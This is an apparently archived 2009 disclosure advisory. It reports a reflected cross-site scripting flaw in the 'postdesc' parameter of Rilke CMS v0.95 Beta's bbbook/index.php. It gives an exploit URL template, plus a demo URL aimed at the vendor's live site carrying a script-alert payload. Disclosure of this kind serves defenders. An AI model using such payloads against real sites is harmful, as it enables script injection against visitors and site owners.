Rilke CMS version 0.95 Beta suffers from a cross site scripting vulnerability.
d76b44b8a35822477b6bd56dc6200078a95b38a0bf99daf4abd8b570b82a461c
===========================================================================================
Title : Cross-site Scripting (XSS) Vulnerability
Software : Rilke CMS v0.95 Beta
Vendor : http://www.rilkecms.com/
Date : 26 April 2009 (Indonesia)
Author : Vrs-hCk
Contact : d00r@telkom.net
Blog : http://c0li.blogspot.com/
===========================================================================================
[-] Vulnerable
./bbbook/index.php
[-] Exploit
http://[site]/[path]/bbbook/index.php?postdesc=[XSS]
[-] Demo
http://www.rilkecms.com/demo/bbbook/index.php?postdesc=<script>alert(123)</script>
===========================================================================================
Greetz :
Paman, NoGe, OoN_Boy, Angela Chang, pizzyroot, zxvf, ajegille, em|nem, loqsa, Fluzy,
bl4Ck_3n91n3, H312Y, S3T4N, Janroe, and special muaacchh buat Dia yg Ku Cintai (*_^)
c0li.m0de.0n and Behave oR BeGone !!!
===========================================================================================